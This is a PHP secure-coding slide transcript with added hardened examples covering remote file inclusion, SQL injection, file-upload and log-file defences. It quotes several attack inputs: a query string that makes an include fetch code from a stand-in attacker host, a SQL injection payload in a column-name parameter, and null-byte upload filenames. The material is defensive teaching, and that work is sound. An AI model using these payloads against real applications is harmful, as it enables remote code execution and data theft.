Php safe-code

Presentation Transcript

    • PHP Secure Coding (Part 2) @ 徐钦勇 (ken@shopex.cn)
    • Register Globals: Example
      • <?php include "$path/script.php"; ?>
      • Submit a request like this one:
      • ?path=http%3A%2F%2Fbadboy.remote.com
      • With register_globals on, the unset $path is filled from the query string, so the include becomes:
      • include 'http://badboy.remote.com/script.php';
      • The result is a remote file inclusion vulnerability.
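The vulnerable include above next to a hardened version, as an added example that is not part of the slides. The `?page=` parameter, the `./pages/` directory and the page names are assumptions made for illustration; the point is that a request parameter selects an entry in a fixed map and is never concatenated into a path.

```php
<?php
// Added example (not from the slides). Assumes a ./pages/ directory and a
// ?page=... parameter; both are assumptions.
declare(strict_types=1);

// Vulnerable form from the slide: with register_globals=On, an unset $path is
// populated from the request, so ?path=http://badboy.remote.com turns this into
// include 'http://badboy.remote.com/script.php' (remote file inclusion).
//
//     include "$path/script.php";
//
// php.ini settings that close the door at the configuration level:
//     register_globals = Off
//     allow_url_include = Off

// Hardened form: never build an include path from user input. Map the request
// parameter onto an allow-list of local scripts and include only the mapped value.
const PAGE_MAP = [
    'home'    => __DIR__ . '/pages/home.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolvePage(array $get): ?string
{
    $page = $get['page'] ?? 'home';
    // Exact-match lookup: no concatenation, so '..', '/' and URL wrappers
    // in the parameter can never reach the filesystem.
    return PAGE_MAP[$page] ?? null;
}

$target = resolvePage($_GET);
if ($target === null) {
    http_response_code(404);
    exit('unknown page');
}
require $target;
```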
    • XSS: Example
    • SQL Injection: Example
    • Numeric input: a value larger than 2147483647 (the signed 32-bit maximum) overflows and comes out negative
    • A column name taken from external input and interpolated into the query: ?field=version() from injection_login where 1 #
    • SQL Injection: Solution
      • Filter the input data
      • Wrap the input data in single quotes
      • Escape the input data: mysql_real_escape_string()
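The three cases from the example and solution slides (a bounded integer, a column name, and a quoted string) handled in one place, as an added example that is not part of the slides. The table `injection_login`, its columns `id`, `name` and `email`, and the `mysqli` connection are assumptions. The slide's `mysql_real_escape_string()` belongs to the `mysql_*` extension, which was removed in PHP 7; the `mysqli` equivalent is used here, and a prepared-statement variant is added as a swapped-in alternative.

```php
<?php
// Added example (not from the slides). Assumes a table
// injection_login(id INT, name, email) and a mysqli connection $db.
declare(strict_types=1);

// 1. Numeric input: accept only a positive integer inside the signed 32-bit
//    range. Casting alone is not enough; a value above 2147483647 overflows
//    a signed INT column, which is the case the slide shows.
function safeId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 2147483647],
    ]);
    return $id === false ? null : $id;
}

// 2. Identifier input: a column name cannot be quoted or escaped as data, so
//    ?field=version() from injection_login where 1 #  has to be stopped by an
//    allow-list of real column names.
const FIELDS = ['id', 'name', 'email'];

function safeField(string $raw): string
{
    return in_array($raw, FIELDS, true) ? $raw : 'id';
}

// 3. String input: quote AND escape, using the escaper that knows the
//    connection's character set (mysql_real_escape_string() in the slide).
function quoted(mysqli $db, string $raw): string
{
    return "'" . $db->real_escape_string($raw) . "'";
}

function buildQuery(mysqli $db, array $get): ?string
{
    $id = safeId($get['id'] ?? '');
    if ($id === null) {
        return null;               // reject instead of letting it overflow
    }
    $field = safeField($get['field'] ?? 'id');
    $name  = quoted($db, $get['name'] ?? '');
    return "SELECT $field FROM injection_login WHERE id = $id AND name = $name";
}

// Swapped-in alternative: a prepared statement keeps data out of the SQL text
// entirely. The identifier still needs the allow-list, because placeholders
// cannot stand in for a column name.
function findByName(mysqli $db, string $field, string $name): array
{
    $field = safeField($field);
    $stmt = $db->prepare("SELECT $field FROM injection_login WHERE name = ?");
    $stmt->bind_param('s', $name);
    $stmt->execute();
    return $stmt->get_result()->fetch_all(MYSQLI_ASSOC);
}
```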
    • The golden rule (葵花宝典): Cookie, Forms, Referer, etc. → Filter → PHP Script → Escape → XHTML, MySQL. Filter everything on the way in, escape everything on the way out for the context it goes to.
    • File write points: uploaded files; log files
    • File upload: 1. Validate the file type 2. Validate the file extension
    • File upload attacks: 1. 00 (null byte) truncation 2. Malformed file names
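An upload handler that applies both checks from the slide and rejects the two attacks it lists, as an added example that is not part of the slides. The form field name `avatar`, the storage directory and the allowed image types are assumptions.

```php
<?php
// Added example (not from the slides). Assumes an upload field named "avatar"
// and a storage directory outside the web root; both are assumptions.
declare(strict_types=1);

const UPLOAD_DIR = '/var/app/uploads';     // never served by the web server
const ALLOWED = [                           // extension => expected content type
    'jpg' => 'image/jpeg',
    'png' => 'image/png',
    'gif' => 'image/gif',
];

function storeUpload(array $file): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }

    $name = (string) $file['name'];
    // 00 truncation: a name such as "shell.php\0.jpg" passes a naive suffix
    // check, but older file functions stop at the NUL and write shell.php.
    // Malformed names ("../x.php", "a.php.", "a.php;.jpg", "a.php.jpg") are
    // rejected by the same strict pattern rather than "cleaned up".
    if (strpos($name, "\0") !== false
        || !preg_match('/^[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})$/', $name, $m)) {
        throw new RuntimeException('bad filename');
    }
    // Validate the extension against an allow-list (not a deny-list).
    $ext = strtolower($m[1]);
    if (!isset(ALLOWED[$ext])) {
        throw new RuntimeException('extension not allowed');
    }

    // Validate the file type by sniffing the content; $file['type'] is sent by
    // the client and is not evidence of anything.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== ALLOWED[$ext]) {
        throw new RuntimeException('content does not match extension');
    }

    // The stored name is generated server-side, so no client-supplied bytes
    // reach the filesystem path at all.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('cannot store file');
    }
    chmod($dest, 0640);
    return $dest;
}

$stored = storeUpload($_FILES['avatar'] ?? []);
```

Storing the file outside the document root and serving it back through a script (or a separate static host) is what makes the extension check a defence in depth rather than the only barrier: even if a disallowed file did get through, nothing would execute it.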
    • File write point: log files
      • Prevent them from being downloaded
      • Prevent them from being executed
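A log writer that addresses both bullets, as an added example that is not part of the slides. The log path and the event fields are assumptions; the design choices (location outside the document root, non-script extension, control characters stripped from user-supplied fields) are the editor's, not the author's.

```php
<?php
// Added example (not from the slides). The log path and the fields logged
// are assumptions.
declare(strict_types=1);

// Prevent download: the file lives outside the document root, so no URL maps
// to it. Prevent execution: it has a non-script extension and sits in a
// directory the web server never serves, so "<?php ... ?>" in a logged
// field is just text.
const LOG_FILE = '/var/log/app/access.log';

function logEvent(string $event, array $fields): void
{
    $clean = [];
    foreach ($fields as $key => $value) {
        // Strip CR, LF and other control characters from user-supplied data so
        // an attacker cannot forge extra log lines or break the record format.
        $clean[$key] = preg_replace('/[\x00-\x1f\x7f]/', '', (string) $value);
    }
    // JSON-encode the fields: quotes and backslashes are escaped, invalid
    // UTF-8 is substituted instead of aborting the write.
    $record = json_encode($clean, JSON_UNESCAPED_SLASHES | JSON_INVALID_UTF8_SUBSTITUTE);
    $line = date('c') . ' ' . $event . ' ' . $record . "\n";

    // Append under an exclusive lock so concurrent requests do not interleave
    // partial lines; the directory should be owned by the application user.
    $fh = fopen(LOG_FILE, 'ab');
    if ($fh === false) {
        return;
    }
    flock($fh, LOCK_EX);
    fwrite($fh, $line);
    flock($fh, LOCK_UN);
    fclose($fh);
}

logEvent('login', [
    'user' => $_POST['user'] ?? '',
    'ip'   => $_SERVER['REMOTE_ADDR'] ?? '',
    'ua'   => $_SERVER['HTTP_USER_AGENT'] ?? '',
]);
```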
    • Cookie spoofing
    • Q&A
    • Reference
      • 高级 PHP 应用程序漏洞审核技术 (Advanced PHP Application Vulnerability Audit Techniques)